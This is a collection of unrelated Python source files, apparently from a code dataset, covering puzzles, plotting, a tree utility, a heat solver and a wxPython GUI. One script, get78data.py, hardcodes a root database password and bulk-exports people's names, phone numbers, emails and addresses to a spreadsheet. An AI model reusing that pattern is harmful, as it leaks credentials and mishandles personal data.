This is a problem.\n        num_dice = int(num_dice)\n        try:\n            die = int(die)\n        except TypeError:  # This means it's probably a SpecialDie, so we can ignore this.\n            # Put in an assert for good luck\n            assert type(die) == SpecialDie\n\n        return Dice(num_dice, die)\n\n    def fate(self, _):\n        return SpecialDie.FATE\n\n    def add(self, args):\n        (left, right,) = args\n\n        operator = _ADDITION_OPERATOR\n\n        return BinaryOperation(left, right, operator)\n\n    def sub(self, args):\n        (left, right,) = args\n\n        operator = _SUBTRACTION_OPERATOR\n\n        return BinaryOperation(left, right, operator)\n\n    def mul(self, args):\n        (left, right,) = args\n\n        operator = _MULTIPLICATION_OPERATOR\n\n        return BinaryOperation(left, right, operator)\n\n    def div(self, args):\n        (left, right,) = args\n\n        operator = _DIVISION_OPERATOR\n\n        return BinaryOperation(left, right, operator)","sub_path":"dice_parser/transformer.py","file_name":"transformer.py","file_ext":"py","file_size_in_byte":2003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"330125857","text":"import pymysql,os,sys,time,re;\nimport openpyxl\n\nstart = '2018-7-1';\nstop = '2018-8-31';\n\nxl = ['初中', '中专','中技', '高中', '大专', '本科', '硕士', '博士','中职','高职'];\ndatabase = {'host':'localhost','user':'root','passwd':'8bee7008d7893cfc','db':'emaildata','charset':'utf8','port':3306}\nfield = ['username','age','sex','phone','email','address','source','texts','id','froms','deliverytime','class_url'];\nconnect = pymysql.connect(host=database['host'],user=database['user'],passwd=database['passwd'],db=database['db'],charset=database['charset'],port=int(database['port']));# connect to the database\ncursor = connect.cursor();# create a cursor\n\n\n\n\nsql = \"select info_id from statistical where addtime >= '%s' and addtime <= '%s'\"%(start,stop);\ncursor.execute(sql);\ndata = cursor.fetchall();\ninfoidlist = [];\nfor row in data:\n\tinfoidlist.append(str(row[0]));\n\ninfoidstr = ','.join(infoidlist);\n\n# query the info table\nsql = \"select %s from info where id in(%s)\"%(','.join(field),infoidstr);\ncursor.execute(sql);\ndata = cursor.fetchall();\nconnect.close();\n\nfield = ['username','age','sex','phone','email','address','source','texts','id','froms','deliverytime'];\n\nth = ['姓名','年龄','性别','电话','学历','邮箱','地址','来源','所属邮箱','采集时间'];\nvalue = [th];\ni = 0;\nfor row in data:\n\tfor x in xl:\n\t\tif x in row[7]:\n\t\t\t# print(row[0],x)\n\t\t\tusername = row[0];\n\t\t\tage = row[1];\n\t\t\tsex = row[2];\n\t\t\tphone = row[3];\n\t\t\temail = row[4];\n\t\t\taddress = row[5];\n\t\t\tsource = row[6];\n\t\t\tfroms = row[9];\n\t\t\taddtime = row[10];\n\t\t\tvalue.append([username,age,sex,phone,x,email,address,source,froms,addtime]);\n\n\nwb = openpyxl.Workbook();\nsheet = wb.active;\nsheet.title = '2007测试表';\nfor i in range(0, len(value)):\n    for j in range(0, len(value[i])):\n        sheet.cell(row=i+1, column=j+1, value=str(value[i][j]));\n\nwb.save('2007测试表.xlsx');\nprint(value)\n\n\nprint();\nprint(len(data))\n\n","sub_path":"get78data.py","file_name":"get78data.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"650997111","text":"T = int(input())\n# middle_seat = [2]\n# aside_seat = [3,4]\n# window_seat = [1]\n# for i in range(1,109):\n#     if i % 6 == 0:\n#         window_seat.append(i)\n#         window_seat.append(i+1)\n# i = 2\n# while i<108:\n#     middle_seat.append(i+3)\n#     i += 3\n# j = 4\n# while j < 108:\n#     aside_seat.append(j+5)\n#     aside_seat.append(j+6)\n#     j += 6\nfor i in range(T):\n    n = int(input())\n
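    # remap n within its block of 12 seats (equivalently n + 11 - 2*((n-1) % 12)), i.e. the seat facing it\n    n = 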
n + 2 * (6 - (n - 1) % 12) - 1\n    if n % 6 < 2:\n        print(n, 'WS')\n    elif n % 6 == 2 or n % 6 == 5:\n        print(n, 'MS')\n    else:\n        print(n, 'AS')\n","sub_path":"seating_arrangement.py","file_name":"seating_arrangement.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"477402718","text":"#Author:wqh\npeople_list = [('张三',1),('李四',2),('王五',3),('马六',4),('张大',5)]\nflag = 0\nwhile flag is not True:\n    # enumerate() combines an iterable (such as a list, tuple or string) into an indexed sequence, yielding each value together with its index; it is usually used in for loops.\n    for item in enumerate(people_list,start = 1):\n        index = item[0]\n        p_name = item[1][0]\n        p_class = item[1][1]\n        print(index,p_name,p_class)\n    break","sub_path":"python/e1/week2/people_list.py","file_name":"people_list.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"187636838","text":"# %load q02_plot/build.py\n# Default Imports\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom greyatomlib.descriptive_stats.q01_calculate_statistics.build import calculate_statistics\n\ndataframe = pd.read_csv('data/house_prices_multivariate.csv')\nsale_price = dataframe.loc[:, 'SalePrice']\n\n\n# Draw the plot for the mean, median and mode for the dataset\ndef plot():\n    sale_price.hist(bins=50)\n    mean, median, mode = calculate_statistics()\n    plt.axvline(x=mean,color='red')\n    plt.axvline(x=median,color='black')\n    plt.axvline(x=mode,color='yellow')\n    plt.show()\n\n\n\n\n\n\n\n\n\n\n\n\n\nplot()\n\n\n\n\n\n\nplot()\n\n\n\n\n\n","sub_path":"q02_plot/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"365068393","text":"import Zero\nimport Events\nimport Property\nimport VectorMath\n\nclass DestroyPlayAnim:\n    def Initialize(self, initializer):\n        self.Activated = False\n        if not self.Owner.DestroyInterface:\n            self.Owner.AddComponentByName(\"DestroyInterface\")\n    def Destroy(self):\n        if not self.Activated:\n            self.Activated = True\n            \n            if not self.Owner.ActionList:\n                self.Owner.AddComponentByName(\"ActionList\")\n            self.Owner.ActionList.EmptyAll()\n            self.Owner.GrowthAnim.SetReverse(True)\n            self.Owner.GrowthAnim.Active = True\n            \n            def waitmovieend():\n                return not self.Owner.GrowthAnim.Active\n            def destroy():\n                self.Owner.Destroy()\n            \n            self.Owner.ActionList.AddCallback(callback=waitmovieend, \n                                              has_self=False, \n                                              blocking=True, \n                                              countdown=None)\n            \n            self.Owner.ActionList.AddCallback(callback=destroy, \n                                              has_self=False, \n                                              blocking=True, \n                                              countdown=1)\n\nZero.RegisterComponent(\"DestroyPlayAnim\", DestroyPlayAnim)","sub_path":"prototypes/w_newIntro/Content/DestroyPlayAnim.py","file_name":"DestroyPlayAnim.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"573094116","text":"# The Riddler Classic 2020-11-13: Bad Football\n# https://fivethirtyeight.com/features/can-you-snatch-defeat-from-the-jaws-of-victory/\n# Monte-Carlo simulation\n\nimport random\n\ndef binomial(n, r):\n    ''' Binomial coefficient, nCr, aka the \"choose\" function \n    n! / (r! * (n - r)!)\n
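    e.g. binomial(5, 2) == 10\n    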
'''\n    #https://stackoverflow.com/questions/26560726/python-binomial-coefficient\n    \n    p = 1 \n    for i in range(1, min(r, n - r) + 1):\n        p *= n\n        p //= i\n        n -= 1\n    return p\n\ndef binopmf(x, n, p):\n    #binomial probability mass function\n\n    return binomial(n, x)*p**x*(1-p)**(n-x)\n\ndef binocdf(x, n, p):\n    #binomial cumulative distribution function\n    \n    s = 0\n    for i in range(x+1):\n        s += binopmf(i, n, p)\n\n    return s\n\ndef prwin(x, y):\n    #returns the probability of winning given the score is x-y,\n    #i.e. the probability of getting the flips needed to reach 51 or more,\n    #within the remaining 101-x-y flips\n\n    return 1 - binocdf(51-x-1, 101-x-y, 0.5)\n\n#score thresholds for 99% chance of winning for each number of flips\nxthres = [101]*100\nxthres[21-1] = 21; #the smallest score with at least 99% chance of winning is 21-0\n\n#compute all the score thresholds (hot-start from previous threshold)\nfor t in range(22, 100+1):\n    for i in range(xthres[t-2], t+1):\n        if (prwin(i, t-i) >= 0.99):\n            xthres[t-1] = i\n            break\n\nNsim = 1000000 #number of simulation replications\ncount = 0\nfor N in range(Nsim):\n\n    #generate a realisation of a binomial process\n    binomprocess = [0]*101\n    binomprocess[0] = random.getrandbits(1)\n    for t in range(0, 100):\n        binomprocess[t+1] = binomprocess[t] + random.getrandbits(1)\n\n    #check if the process reached the threshold at any point, and then lost\n    if (any([binomprocess[t] >= xthres[t] for t in range(21, 100)]) and binomprocess[-1] < 51):\n        count += 1\n\nprint(count/Nsim)\n","sub_path":"classic/bad_football.py","file_name":"bad_football.py","file_ext":"py","file_size_in_byte":1899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"445503290","text":"import unittest\n\nfrom tiktorch.build_spec import BuildSpec, TikTorchSpec\n\n\nclass BuildSpecTest(unittest.TestCase):\n    def test_BuildUNet2d(self):\n        spec = TikTorchSpec(\n            code_path=\"/home/jo/sfb1129/pretrained_net_constantin/ISBI2012_UNet_pretrained/model.py\",\n            model_class_name=\"UNet2dGN\",\n            state_path=\"/home/jo/sfb1129/pretrained_net_constantin/ISBI2012_UNet_pretrained/state.nn\",\n            input_shape=(1, 572, 572),\n            minimal_increment=[32, 32],\n            model_init_kwargs={\"in_channels\": 1, \"out_channels\": 1, \"initial_features\": 64},\n        )\n        spec.validate()\n        build_spec = BuildSpec(build_directory=\"/home/jo/ISBI_UNet_pretrained\", device=\"cpu\")\n        build_spec.build(spec)\n\n    def test_BuildDUNet2d(self):\n        spec = TikTorchSpec(\n            code_path=\"/home/jo/config/model.py\",\n            model_class_name=\"DUNet2D\",\n            state_path=\"/home/jo/config/state.nn\",\n            input_shape=[1, 512, 512],\n            minimal_increment=[32, 32],\n            model_init_kwargs={\"in_channels\": 1, \"out_channels\": 1},\n        )\n        spec.validate()\n        build_spec = BuildSpec(build_directory=\"/home/jo/CREMI_DUNet_pretrained\", device=\"cpu\")\n        build_spec.build(spec)\n\n    def test_BuildDUNet3d(self):\n        spec = TikTorchSpec(\n            code_path=\"/home/jo/uni/master-models/master_models/models/dunet3D.py\",\n            model_class_name=\"DUNet3D\",\n            state_path=\"/home/jo/uni/master-models/master_models/results/dunet3D/trained_net/best_model_dunet3D.torch\",\n            input_shape=[1, 512, 512],\n            minimal_increment=[32, 32],\n            model_init_kwargs={\"in_channels\": 1, \"out_channels\": 1},\n        )\n        spec.validate()\n        build_spec = BuildSpec(build_directory=\"/home/jo/CREMI_DUNet_pretrained\", device=\"cpu\")\n        build_spec.build(spec)\n\n\nif __name__ == \"__main__\":\n
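    # run the three BuildSpec tests above\n    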
unittest.main()\n","sub_path":"tests_old/test_build_spec.py","file_name":"test_build_spec.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"300368173","text":"from report import report_sxw\nfrom datetime import datetime\n\nclass Parser(report_sxw.rml_parse):\n def __init__(self, cr, uid, name, context=None):\n super(Parser, self).__init__(cr, uid, name, context=context)\n self.total = 0.0\n self.time = 0.0\n self.no_page = 0\n self.localcontext.update({\n 'get_total' : self.get_total,\n 'main_total' : self.main_total,\n 'get_date' : self.get_date,\n 'get_time_factor':self.get_time_factor,\n 'total_time_factor':self.total_time_factor,\n 'get_invoice' : self.get_invoice,\n })\n self.context = context\n\n def get_total(self,qty,price):\n self.total += qty*price\n return qty*price\n \n def main_total(self):\n tot = self.total\n self.total = 0.0\n return tot\n \n def get_date(self,date):\n a = datetime.strptime(date, '%Y-%m-%d')\n return a.strftime('%d/%m/%Y')\n \n def get_time_factor(self,time_factor1):\n self.time += time_factor1\n return time_factor1\n \n def total_time_factor(self):\n tf = self.time\n self.time=0.0\n return tf\n \n def get_invoice(self, order_lines):\n extend_ids = []\n res = {}\n return_rec = []\n for line in order_lines:\n for extend in line.extend_ids:\n if extend.id not in extend_ids:\n extend_ids.append(extend.id)\n res.update({extend.id : {'code' : extend.code or '', 'task_desc' : extend.task_desc or '', 'lines' : [line]}})\n else:\n if not res.get(extend.id, {}):\n res[extend.id]['lines'] = []\n \n res[extend.id]['lines'] += [line]\n for extend_id in extend_ids:\n return_rec.append(res[extend_id])\n return return_rec\n","sub_path":"project_spreadsheet_extended/report/aeroo_parse.py","file_name":"aeroo_parse.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"239907060","text":"##############################################\n## Author: I-No Liao ##\n## Date of update: 2018/04/16 ##\n## Description: Tree ##\n##############################################\n\nimport collections\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass BinaryTree:\n def __init__(self):\n pass\n\n # @param nodes: list\n # @param idx: int\n # @return TreeNode\n def makeTree(self, nodes, idx):\n if len(nodes) == 0 or idx >= len(nodes) or nodes[idx] == 'null':\n return None \n root = TreeNode(nodes[idx])\n root.left = self.makeTree(nodes, idx*2+1)\n root.right = self.makeTree(nodes, idx*2+2)\n return root\n\n # @param root: TreeNode\n # @return list[int]\n # Time: O(n)\n # Space: O(n)\n def levelOrder(self, root):\n if root is None:\n return []\n result = []\n q = collections.deque()\n q.append(root)\n while q:\n curNode = q.popleft()\n result.append(curNode.val)\n if curNode.left:\n q.append(curNode.left)\n if curNode.right:\n q.append(curNode.right) \n return result\n \n # @param root: TreeNode\n # @return list[list[int]]\n # Time: O(n)\n # Space: O(n)\n def levelOrderTopDown(self, root):\n if root is None:\n return []\n result, current = [], [root]\n while current:\n values, nextLevel = [], []\n for node in current:\n values.append(node.val)\n if node.left:\n nextLevel.append(node.left)\n if node.right:\n nextLevel.append(node.right)\n current = nextLevel\n result.append(values)\n return result\n\n # @param 
root: TreeNode\n # @return list[list[int]]\n # Time: O(n)\n # Space: O(n)\n def levelOrderBottomUp(self, root):\n result = self.levelOrderTopDown(root)\n return result[::-1]\n \n # @param curr: TreeNode\n # @param depth: int\n # @param LUT: dict{int:int}\n # @return dict{int:int}\n # dict{depth:node.val}\n def getLevelElements(self, curr, depth, LUT):\n if curr is None:\n return LUT\n if LUT.get(depth) is None:\n LUT[depth] = [curr.val]\n else:\n LUT[depth].append(curr.val)\n self.getLevelElements(curr.left, depth+1, LUT)\n self.getLevelElements(curr.right, depth+1, LUT)\n return LUT\n \n # @param root: TreeNode\n # @param LUT: dict{int:int}\n # @return dict{int:int}\n # dict{node.val:occurrenc}\n def getElements(self, root, LUT):\n if root is None:\n return LUT\n if LUT.get(root.val) is None:\n LUT[root.val] = 1\n else:\n LUT[root.val] += 1\n self.getElements(root.left, LUT)\n self.getElements(root.right, LUT)\n return LUT\n \n # @param root: TreeNode\n # @return List[int]\n # leetcode 094. Binary Tree Inorder Traversal\n def inorder(self, root):\n if not root:\n return []\n result = []\n result += self.inorder(root.left)\n result.append(root.val)\n result += self.inorder(root.right)\n return result\n \n # @param curr: TreeNode\n # @return list[int]\n # Time: O(n)\n # Space: O(1)\n # https://www.youtube.com/watch?v=wGXB9OWhPTg\n # https://www.cnblogs.com/AnnieKim/archive/2013/06/15/MorrisTraversal.html\n def morrisInorder(self, curr):\n result = []\n predecessor = None\n while curr:\n if curr.left is None:\n result.append(curr.val)\n curr = curr.right\n else:\n # Current node is assigned to be predecessor before traversing left subtree.\n # Locate predecessor by linking back to current node from the left subtree's right-most node.\n predecessor = curr.left\n while predecessor.right and predecessor.right != curr:\n predecessor = predecessor.right\n \n # Right-most node of current node's left subtree will new a link pointing back to current node.\n if predecessor.right is None:\n predecessor.right = curr\n curr = curr.left\n else:\n # Entering else means that the left subtree of current node has been traversed.\n # So NULL the link pointing to predecessor and print the current node safely.\n predecessor.right = None\n result.append(curr.val)\n curr = curr.right\n return result\n \n # @param root: TreeNode\n # @param target: int\n # @return bool\n def searchBST(self, root, target):\n if root is None:\n return False\n if root.val == target:\n return True\n elif target > root.val:\n return self.searchBST(root.right, target)\n elif target < root.val:\n return self.searchBST(root.left, target)\n","sub_path":"Tree.py","file_name":"Tree.py","file_ext":"py","file_size_in_byte":5222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"52862061","text":"from math import fabs\r\na1 = 0.0134\r\nb1 = 1\r\nc1 = 4.35e-4\r\nm1 = 1\r\na2 = 2.049\r\nb2 = 0.563e-3\r\nc2 = 0.528e5\r\nm2 = 1\r\nalpha0 = 0.05\r\nalphaN = 0.01\r\nl = 10\r\nT0 = 300\r\nR = 0.5\r\nF0 = 50\r\nh = 1e-3\r\nt = 1\r\n\r\ndef get_consts():\r\n cc = (-alpha0*alphaN*l)/(alphaN-alpha0)\r\n dd = (alphaN*l)/(alphaN-alpha0)\r\n return cc, dd\r\ndef alpha(x):\r\n return cc/(x-dd)\r\n\r\ndef k(T):\r\n return a1 * (b1 + c1 * T ** m1)\r\n\r\ndef c(T):\r\n return a2 + b2 * T ** m2 - (c2 / T ** 2)\r\n\r\ndef A(T):\r\n return t / h * count_minus_half(k, T, t)\r\n\r\ndef D(T):\r\n return t / h * count_plus_half(k, T, t)\r\n\r\ndef B(x, T):\r\n return A(T) + D(T) + h * c(T) + h * t * 2 * alpha(x) / 
R\r\n\r\ndef F(x, T):\r\n    return h * t * 2 * T0 * alpha(x) / R + T * h * c(T)\r\n\r\ndef count_plus_half(function, n, step):\r\n    return (function(n) + function(n + step)) / 2\r\n\r\ndef count_minus_half(function, n, step):\r\n    return (function(n) + function(n - step)) / 2\r\n\r\ndef find_koef_with_left(T):\r\n    chalf = count_plus_half(c, T[0], t)\r\n    khalf = count_plus_half(k, T[0], t)\r\n    c0 = c(T[0])\r\n    K0 = h / 8 * chalf + h / 4 * c0 + t / h * khalf + t * h / 4 * alpha(h / 2) / R + t * h / 2 * alpha(0) / R\r\n    M0 = h / 8 * chalf - t / h * khalf + t * h / 4 * alpha(h / 2) / R\r\n    P0 = h / 8 * chalf * (T[0] + T[1]) + h / 4 * c0 * T[0] + F0 * t + t * h / 4 * T0 / R * (3 * alpha(0) + alpha(h))\r\n    return K0, M0, P0\r\n\r\ndef find_koef_with_right(T):\r\n    chalf = count_minus_half(c, T[-1], t)\r\n    khalf = count_minus_half(k, T[-1], t)\r\n    cN = c(T[-1])\r\n    KN = h / 8 * chalf + h / 4 * cN + t / h * khalf + t * alphaN + t * h * alpha(l - h / 2)/R/4 + t * h * alpha(l)/R/4\r\n    MN = h / 8 * chalf - t / h * khalf + t * h * alpha(l - h / 2)/R/4\r\n    PN = h / 8 * chalf * (T[-1] + T[-2]) + h / 4 * cN * T[-1] + t * alphaN * T0 + t * h / 2 / R * T0 * (alpha(l) + alpha(l - h / 2))\r\n    return KN, MN, PN\r\n\r\ndef find_next (y):\r\n    K0, M0, P0 = find_koef_with_left(y)\r\n    KN, MN, PN = find_koef_with_right(y)\r\n    ksi = [0, -M0 / K0]\r\n    eta = [0, P0 / K0]\r\n    x = h\r\n    n = 1\r\n    while (x + h < l):\r\n        znam = (B(x, y[n]) - A(y[n]) * ksi[n])\r\n        ksi.append(D(y[n]) / znam)\r\n        eta.append((F(x, y[n]) + A(y[n]) * eta[n]) / znam)\r\n        n += 1\r\n        x += h\r\n    ynext = [0] * (n + 1)\r\n    ynext[n] = (PN - MN * eta[n]) / (KN + MN * ksi[n])\r\n    for i in range(n - 1, -1, -1):\r\n        ynext[i] = ksi[i + 1] * ynext[i + 1] + eta[i + 1]\r\n    return ynext\r\n\r\ndef iterations():\r\n    N = int(l / h + 1)\r\n    ti = 0\r\n    y = [T0]*N\r\n    res = []\r\n    res.append(y)\r\n    ynext = [0]*N\r\n    while 1:\r\n        ycur = y\r\n        while 1:\r\n            ynext = find_next(ycur)\r\n            maxfault = fabs((y[0] - ynext[0]) / ynext[0])\r\n            for i in range(1, N):\r\n                fault = fabs((y[i] - ynext[i]) / ynext[i])\r\n                if fault > maxfault:\r\n                    maxfault = fault\r\n            if maxfault < 1:\r\n                break\r\n            ycur = ynext\r\n        res.append(ynext)\r\n        ti += t\r\n        flag = 0\r\n        for i in range(N):\r\n            if fabs((y[i] - ynext[i]) / ynext[i]) < 1e-4:\r\n                flag = 1\r\n        if flag:\r\n            break\r\n        y = ynext\r\n    return res, ti\r\n\r\ndef work():\r\n    global cc, dd\r\n    cc, dd = get_consts()\r\n    res, ti = iterations()\r\n    return res, ti","sub_path":"6-semestr/lab4/lab4.py","file_name":"lab4.py","file_ext":"py","file_size_in_byte":3313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"533604057","text":"# -*- coding: utf-8 -*-\nimport wx\nimport numpy as np\nimport matplotlib\nimport logistic\nimport roc_auc\n\n# Use the WXAgg backend so matplotlib can be embedded in wxPython\nmatplotlib.use(\"WXAgg\")\n\nfrom matplotlib.backends.backend_wxagg import FigureCanvasWxAgg as FigureCanvas\nfrom matplotlib.backends.backend_wxagg import NavigationToolbar2WxAgg as NavigationToolbar\nfrom matplotlib.ticker import MultipleLocator\n\nimport pylab\nfrom matplotlib import pyplot\n\n\nclass MPL_Panel_base(wx.Panel):\n    ''''' #MPL_Panel_base panel, which can be subclassed or instantiated directly'''\n\n    def __init__(self, parent):\n        wx.Panel.__init__(self, parent=parent, id=-1)\n\n        self.Figure = matplotlib.figure.Figure(figsize=(4, 3))\n        self.axes = self.Figure.add_axes([0.1, 0.1, 0.8, 0.8])\n        self.FigureCanvas = FigureCanvas(self, -1, self.Figure)\n\n        self.NavigationToolbar = NavigationToolbar(self.FigureCanvas)\n\n
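        # status line under the toolbar; ShowHelpString() writes help text such as the AUC readout here\n        self.StaticText = 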
wx.StaticText(self, -1, label='')\n        \n        self.SubBoxSizer = wx.BoxSizer(wx.VERTICAL)\n        self.SubBoxSizer.Add(self.NavigationToolbar, proportion=0, border=2, flag=wx.ALL | wx.EXPAND)\n        self.SubBoxSizer.Add(self.StaticText, proportion=-1, border=2, flag=wx.ALL | wx.EXPAND)\n        \n        self.TopBoxSizer = wx.BoxSizer(wx.VERTICAL)\n        self.TopBoxSizer.Add(self.SubBoxSizer, proportion=-1, border=2, flag=wx.ALL | wx.EXPAND)\n        self.TopBoxSizer.Add(self.FigureCanvas, proportion=-10, border=2, flag=wx.ALL | wx.EXPAND)\n        \n        self.SetSizer(self.TopBoxSizer)\n\n\n    def UpdatePlot(self):\n        '''''# After changing any property of the figure, call self.UpdatePlot() to refresh the GUI '''\n        self.FigureCanvas.draw()\n\n    def plot(self, *args, **kwargs):\n        '''''# The most commonly used plotting command, plot '''\n        self.axes.plot(*args, **kwargs)\n        self.UpdatePlot()\n\n    def grid(self, flag=True):\n        ''''' ## Show or hide the grid '''\n        if flag:\n            self.axes.grid()\n        else:\n            self.axes.grid(False)\n\n    def title_MPL(self, TitleString=\"wxMatPlotLib Example In wxPython\"):\n        ''''' # Add a title to the figure '''\n        self.axes.set_title(TitleString)\n\n    def xlabel(self, XabelString=\"X\"):\n        ''''' # Add xlabel to the plotting '''\n        self.axes.set_xlabel(XabelString)\n\n    def ylabel(self, YabelString=\"Y\"):\n        ''''' # Add ylabel to the plotting '''\n        self.axes.set_ylabel(YabelString)\n\n    def xticker(self, major_ticker=1.0, minor_ticker=0.1):\n        ''''' # Set the tick spacing of the X axis '''\n        self.axes.xaxis.set_major_locator(MultipleLocator(major_ticker))\n        self.axes.xaxis.set_minor_locator(MultipleLocator(minor_ticker))\n\n    def yticker(self, major_ticker=1.0, minor_ticker=0.1):\n        ''''' # Set the tick spacing of the Y axis '''\n        self.axes.yaxis.set_major_locator(MultipleLocator(major_ticker))\n        self.axes.yaxis.set_minor_locator(MultipleLocator(minor_ticker))\n\n    def savefig(self, *args, **kwargs):\n        ''' # Save the figure to a file '''\n        self.Figure.savefig(*args, **kwargs)\n\n    def clean(self):\n        ''' # Must be called to clear the previous figure before plotting again '''\n        self.axes.clear()\n        self.Figure.set_canvas(self.FigureCanvas)\n        self.UpdatePlot()\n\n    def ShowHelpString(self, HelpString=\"Show Help String\"):\n        ''''' # Can be used to show help info, such as the mouse position '''\n        self.StaticText.SetLabel(HelpString)\n\nclass MPL2_Frame(wx.Frame):\n    \"\"\"MPL2_Frame can be subclassed and modified, or used directly\"\"\"\n\n    def __init__(self, title=\"Logistic Regression\", size=(500, 500)):\n        wx.Frame.__init__(self, parent=None, title=title, size=size)\n\n        self.BoxSizer = wx.BoxSizer(wx.HORIZONTAL)\n\n        self.MPL = MPL_Panel_base(self)\n        self.BoxSizer.Add(self.MPL, proportion=-1, border=2, flag=wx.ALL | wx.EXPAND)\n\n        self.RightPanel = wx.Panel(self, -1)\n        self.BoxSizer.Add(self.RightPanel, proportion=0, border=2, flag=wx.ALL | wx.EXPAND)\n\n        self.SetSizer(self.BoxSizer)\n\n        # Create the FlexGridSizer\n        self.FlexGridSizer = wx.FlexGridSizer(rows=9, cols=1, vgap=5, hgap=5)\n        self.FlexGridSizer.SetFlexibleDirection(wx.BOTH)\n\n\n        self.Button1 = wx.Button(self.RightPanel, -1, \"Train\", size=(100, 40), pos=(10, 10))\n        self.Button1.Bind(wx.EVT_BUTTON, self.Button1Event)\n\n\n        self.Button2 = wx.Button(self.RightPanel, -1, \"ROC\", size=(100, 40), pos=(10, 10))\n        self.Button2.Bind(wx.EVT_BUTTON, self.Button2Event)\n        \n\n        self.Button3 = wx.Button(self.RightPanel, -1, \"Data\", size=(100, 40), pos=(10, 10))\n        self.Button3.Bind(wx.EVT_BUTTON, self.Button3Event)\n        self.timeLabel = wx.StaticText(self.RightPanel,-1,\"Training sessions:\",pos=(10,10),size=(100,30))\n        self.timeText=wx.TextCtrl(self.RightPanel,-1,\"500\",pos=(10,10),size=(100,30))\n        \n        # Add the widgets to the sizer\n        self.FlexGridSizer.Add(self.timeLabel, proportion=0, border=5, flag=wx.ALL | wx.EXPAND)\n        self.FlexGridSizer.Add(self.timeText, proportion=0, border=5, flag=wx.ALL | wx.EXPAND)\n
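        # the Train / ROC / Data buttons defined above\n        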
self.FlexGridSizer.Add(self.Button1, proportion=0, border=5, flag=wx.ALL | wx.EXPAND)\n        self.FlexGridSizer.Add(self.Button2, proportion=0, border=5, flag=wx.ALL | wx.EXPAND)\n        self.FlexGridSizer.Add(self.Button3, proportion=0, border=5, flag=wx.ALL | wx.EXPAND)\n        \n        \n        self.RightPanel.SetSizer(self.FlexGridSizer)\n\n        # Status bar\n        self.StatusBar()\n\n        # Center the MPL2_Frame window on the screen\n        self.Centre(wx.BOTH)\n\n\n\n    # Button event handlers, used for testing\n\n    def Button1Event(self, event):\n        logistic.colicTest(int(self.timeText.GetValue()))\n        dlg = wx.MessageDialog(self,self.timeText.GetValue()+\" training sessions have been completed.\",'Message', wx.OK | wx.ICON_INFORMATION)\n        dlg.ShowModal()\n        dlg.Destroy()\n    def Button2Event(self, event):\n        \n        auc=roc_auc.auc_calculate()\n        self.MPL.clean()\n        x,y = roc_auc.get_x_y()\n        self.MPL.plot(x, y, ':^b')\n        self.MPL.ShowHelpString('AUC={:.6f}'.format(auc))\n        self.MPL.xticker(0.2, 0.02)\n        self.MPL.yticker(0.2, 0.02)\n        self.MPL.title_MPL(\"ROC\")\n        self.MPL.grid()\n        self.MPL.UpdatePlot()\n\n    def Button3Event(self, event):\n        f = open('mrtest.txt','r')\n        data=''\n        for i in f.readlines():\n            data=data+'('+str(i).strip() +')'\n        dlg = wx.MessageDialog(self,data,'Data', wx.OK | wx.ICON_INFORMATION)\n        dlg.ShowModal()\n        dlg.Destroy()\n\n    # Create the status bar automatically\n\n    def StatusBar(self):\n        self.statusbar = self.CreateStatusBar()\n        self.statusbar.SetFieldsCount(3)\n        self.statusbar.SetStatusWidths([-2, -2, -1])\n\n\nif __name__ == '__main__':\n    app = wx.App()\n    frame = MPL2_Frame()\n    frame.Center()\n    frame.Show()\n    app.MainLoop()\n","sub_path":"_mushroom/GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":6865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"401217425","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\nfrom __future__ import absolute_import, division, print_function, unicode_literals\nimport numpy as np\nfrom astropy.io import fits\nfrom astropy.coordinates import Angle\nfrom astropy.units import Quantity\nfrom astropy.table import Table\nfrom ..utils.energy import EnergyBounds, Energy\nfrom ..utils.array import array_stats_str\nfrom ..utils.scripts import make_path\nfrom ..utils.nddata import NDDataArray, BinnedDataAxis\nfrom ..utils.fits import energy_axis_to_ebounds\n\n__all__ = [\n    'EnergyDispersion',\n    'EnergyDispersion2D',\n]\n\n\nclass EnergyDispersion(NDDataArray):\n    \"\"\"Energy dispersion matrix.\n\n    We use a dense matrix (`numpy.ndarray`) for the energy dispersion matrix.\n    An alternative would be to store a sparse matrix\n    (`scipy.sparse.csc_matrix`). 
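(Sparse storage mainly pays off when most of the matrix entries are zero.) 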
